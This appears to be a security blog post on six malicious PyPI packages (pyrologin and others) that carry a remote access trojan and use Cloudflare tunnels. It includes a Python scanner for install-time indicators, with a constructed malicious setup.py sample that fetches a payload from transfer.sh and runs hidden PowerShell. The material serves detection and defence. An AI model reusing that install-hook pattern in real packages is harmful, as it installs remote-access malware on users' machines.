Researchers discovered that six packages on PyPI, the Python Package Index, are laced with remote access trojan (RAT) and information-stealing malware, and use Cloudflare tunnels to evade firewalls.
The rogue packages’ abilities include keylogging, shell command execution and theft of critical user information from browsers, according to Phylum’s security advisory.
Security experts first detected the malicious content on December 22, 2022, but the perpetrators continued to upload poisoned packages until December 31. The malicious packages are as follows:
pyrologin
easytimestamp
discorder
discord-dev
style.py
pythonstyles
The first malicious package detected was pyrologin; researchers initially believed it was “standard Python malware.” Upon closer inspection, though, they discovered that the package also fetched an archive from a third-party file-sharing site and contained PowerShell commands meant to hide the execution of whatever that archive delivered.
“One thing that did stick out in this package, however, was the fetching of a zip file from a transfer[.]sh site and some strings that contained PowerShell code with 'SilentlyContinue' and -WindowStyle Hidden in it,” reads Phylum’s announcement. “This looked like a clear attempt to hide whatever code the attacker was trying to execute.”
After retrieving the archive, the script unpacks it on the compromised device and installs a series of requirements to enable screenshot capturing and remote control. The PowerShell stage runs with the -ErrorAction SilentlyContinue flag, so a failed step does not raise an error message the user might notice; combined with -WindowStyle Hidden, the whole stage runs without any visible window.
Included in the archive is a server component that launches four threads:
At this step, the script uses a different Python script included in the archive to install a Cloudflare Tunnel client on the victim’s machine. Cloudflare Tunnel lets perpetrators make the compromised device remotely accessible without opening ports or configuring firewall rules: the client opens an outbound connection to Cloudflare’s edge, which most egress firewalls allow, and the attacker reaches the device through that connection rather than through an inbound listener.
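The install-time behaviour described above (a fetch from transfer.sh, a hidden PowerShell window with error suppression, and a tunnel client dropped afterwards) leaves recognisable strings in a package's source. The following Python scanner is an added example, not code from Phylum's advisory, Bitdefender or the packages themselves; it checks a setup.py string or a downloaded sdist/wheel archive for those indicators. The sample setup.py it scans is constructed to mimic the described behaviour and is not the real pyrologin code, and the strings `cloudflared` and `trycloudflare.com` are assumptions from general knowledge of Cloudflare Tunnel, which the article does not name.

```python
"""Static indicator scan for install-time malware in a Python package.

Added example, not Phylum's or Bitdefender's code. Meant to run over an sdist
obtained with `pip download --no-deps --no-binary :all: <pkg>` BEFORE
`pip install`, since pip executes setup.py when installing an sdist.
"""
import io
import os
import re
import tarfile
import tempfile
import zipfile

# Indicators named in the advisory (transfer.sh fetch, hidden PowerShell
# window, SilentlyContinue) plus generic install-time network/shell activity.
# "cloudflared" / "trycloudflare.com" are assumptions about the tunnel client,
# not strings the article reports. \W+ tolerates both a space and the
# `", "` separating list-form subprocess arguments.
INDICATORS = {
    "transfer.sh download": re.compile(r"transfer\.sh", re.I),
    "hidden PowerShell window": re.compile(r"-WindowStyle\W+Hidden", re.I),
    "PowerShell error suppression": re.compile(r"-ErrorAction\W+SilentlyContinue", re.I),
    "network fetch at install time": re.compile(r"urlretrieve|urlopen|requests\.get", re.I),
    "shell execution at install time": re.compile(r"subprocess\.|os\.system|os\.popen", re.I),
    "Cloudflare tunnel client": re.compile(r"cloudflared|trycloudflare\.com", re.I),
}

# Constructed sample modelled on the described behaviour (NOT the real package).
MALICIOUS_SETUP = r'''
import subprocess, urllib.request
from setuptools import setup
urllib.request.urlretrieve("https://transfer.sh/example/payload.zip", "payload.zip")
subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-Command",
                  "Expand-Archive payload.zip -ErrorAction SilentlyContinue; python server.py"])
setup(name="pyrologin", version="0.1")
'''

# Constructed benign sample: a plain setup() call with no side effects.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="easytimestamp-clean", version="1.0", packages=["easytimestamp"])
'''


def scan_source(source: str) -> list[str]:
    """Return the names of every indicator that matches in a Python source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def is_suspicious(source: str, threshold: int = 2) -> bool:
    """A lone network call appears in some legitimate build scripts, so require
    at least `threshold` independent indicators before flagging a package."""
    return len(scan_source(source)) >= threshold


def _py_members(path: str):
    """Yield (member_name, source_text) for each .py file in a tar or zip archive."""
    if tarfile.is_tarfile(path):
        with tarfile.open(path) as tf:
            for m in tf.getmembers():
                if m.isfile() and m.name.endswith(".py"):
                    yield m.name, tf.extractfile(m).read().decode("utf-8", "replace")
    elif zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as zf:
            for name in zf.namelist():
                if name.endswith(".py"):
                    yield name, zf.read(name).decode("utf-8", "replace")
    else:
        raise ValueError(f"{path}: not a tar or zip archive")


def scan_archive(path: str) -> dict[str, list[str]]:
    """Scan an sdist (.tar.gz) or wheel (.whl/.zip); return {member: [indicators]}
    for every .py member that matched at least one indicator."""
    hits: dict[str, list[str]] = {}
    for name, text in _py_members(path):
        found = scan_source(text)
        if found:
            hits[name] = found
    return hits


def build_sample_sdist(path: str, setup_source: str) -> str:
    """Write a minimal .tar.gz sdist holding one setup.py (test fixture only)."""
    data = setup_source.encode()
    with tarfile.open(path, "w:gz") as tf:
        info = tarfile.TarInfo("pkg-0.1/setup.py")
        info.size = len(data)
        tf.addfile(info, io.BytesIO(data))
    return path


def demo_archive_scan() -> dict[str, list[str]]:
    """Build a throwaway sdist from the constructed sample and scan it."""
    with tempfile.TemporaryDirectory() as d:
        return scan_archive(build_sample_sdist(os.path.join(d, "pkg-0.1.tar.gz"), MALICIOUS_SETUP))


if __name__ == "__main__":
    print("constructed malicious sample:", scan_source(MALICIOUS_SETUP))
    print("suspicious?", is_suspicious(MALICIOUS_SETUP), "/ benign suspicious?", is_suspicious(BENIGN_SETUP))
    print("archive scan:", demo_archive_scan())
```

String matching like this catches only the plain form the advisory describes; a base64- or exec()-wrapped stage would need decoding first, so treat a hit as a reason to read the setup.py by hand rather than as proof of safety when nothing fires.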
Threat actors combine the firewall-dodging capabilities of the tunnel with a remote access trojan planted on the infected device to:
Although the malicious packages have been removed from PyPI and their publishers have been banned, the threat actors could still find their way back to the repository under new names.
Removal from the platform does nothing for devices where the packages were already installed. Users who installed any of the packages must remove them manually, and uninstalling the package itself is not enough: the archive it unpacked, the requirements it installed and the tunnel client it set up remain on the machine and need to be removed as well.
Dedicated software such as Bitdefender Ultimate Security can keep you safe from trojans, info-stealers and other cyber threats with its extensive range of features, including:
Vlad's love for technology and writing created rich soil for his interest in cybersecurity to sprout into a full-on passion. Before becoming a Security Analyst, he covered tech and security topics.